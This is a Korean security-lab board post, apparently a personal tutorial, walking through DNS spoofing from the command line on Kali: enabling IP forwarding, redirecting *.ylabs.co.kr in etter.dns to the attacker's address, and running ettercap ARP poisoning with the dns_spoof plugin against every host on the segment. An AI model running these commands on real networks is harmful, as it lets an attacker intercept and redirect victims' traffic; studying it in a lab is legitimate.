본문 바로가기
조회 수 4579 추천 수 0 댓글 0
?

단축키

Prev이전 문서

Next다음 문서

+ - Up Down Comment Print Files
?

단축키

Prev이전 문서

Next다음 문서

+ - Up Down Comment Print Files
DNS Spoofing from CLI (ip forwarding + arp spoofing + dns spoofing with ettercap)

kali: 192.168.122.148 - 00:0c:29:f9:81:10

1. enable ip forwarding in kali
echo 1 > /proc/sys/net/ipv4/ip_forward

2. set fake ip for target web site in etter.dns
locate etter.dns
vi /etc/ettercap/etter.dns
------------------8<--------------------
*.ylabs.co.kr   A       192.168.122.148
------------------8<--------------------

3. check ip for www.ylabs.co.kr in victim machine
01.png

4. run ettercap targeting ANY for arp spoofing + dns spoofing 
ettercap -T -q -M arp:remote -P dns_spoof //

Note: ettercap usage and options
Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]
  -T, --text                  use text only GUI
       -q, --quiet                 do not display packet contents
  -M, --mitm <METHOD:ARGS>    perform a mitm attack
  -P, --plugin <plugin>       launch this <plugin>
  
Note: mitm attacks
arp ([remote],[oneway])
icmp (MAC/IP)
dhcp (ip_pool/netmask/dns)
port ([remote],[tree])

03.png

Note: packets from Kali
1) sends arp packets for scanning
02.png
2) keep sending arp reply for arp poisoning
06.png

5. from victim machine, check arp table and ip address for ylabs.co.kr
04.png

Note: verify the following message from kali
05.png


Title
List of Articles
번호 제목 글쓴이 날짜 조회 수
46 Install crunch on Mac and examples Hojung 2015.02.18 2795
45 Create Kali Live USB Persistence from Mac file Hojung 2015.02.18 3087
44 Firewall Assessment with Prometheus file Hojung 2015.02.04 2237
43 Install WebGoat 5.3 in Kali file Hojung 2015.02.02 3759
42 brute-force HTTP/S basic access authentication with hydra file Hojung 2015.01.07 3605
41 Session Cookie 세부항목에 대해 (secure, Http Only flag) Hojung 2015.01.06 4674
40 쉘코드(shell code)란 payload로 사용되는 작은 코드조각 Hojung 2014.12.23 4295
39 Netcat (nc) guide (port scan, file transfer, backdoor, reverse shell, source port/ip) Hojung 2014.12.16 2381
38 SSH Tunnels (ssh -L localport:host:hostport user@ssh_server -N) Hojung 2014.12.16 1651
37 How to install Damn Vulnerable Linux (DVL) file Hojung 2014.11.26 3123
36 Five Steps of a Hacking Attack Hojung 2014.11.24 1532
35 How to install Snorby in Kali (snort) Hojung 2014.11.19 2856
34 TightVNC on Kali Hojung 2014.11.18 2313
33 10 stage Generic attack process in a nutshell (in chronological order) Hojung 2014.11.07 1734
32 Send HEAD request with netcat (nc - banner grabbing) Hojung 2014.11.05 1874
31 Birthday Attack, Birthday Paradox Hojung 2014.11.03 1746
30 Discovering rogue AP with nmap Hojung 2014.11.03 1742
29 DoS (Denial of Service) 공격에 대해 (Ping of Death, Syn Flooding 공격/탐지/대응, Tear Drop, Smurf/Fraggle, LAND Attack) file Hojung 2014.11.02 5252
28 DNS Spoofing from GUI (ip forwarding + arp spoofing + dns spoofing with ettercap) file Hojung 2014.10.06 2819
» DNS Spoofing from CLI (ip forwarding + arp spoofing + dns spoofing with ettercap) file Hojung 2014.10.06 4579
Board Pagination ‹ Prev 1 2 ... 3 Next ›
/ 3

Designed by sketchbooks.co.kr / sketchbook5 board skin

나눔글꼴 설치 안내


이 PC에는 나눔글꼴이 설치되어 있지 않습니다.

이 사이트를 나눔글꼴로 보기 위해서는
나눔글꼴을 설치해야 합니다.

설치 취소

Sketchbook5, 스케치북5

Sketchbook5, 스케치북5

Sketchbook5, 스케치북5

Sketchbook5, 스케치북5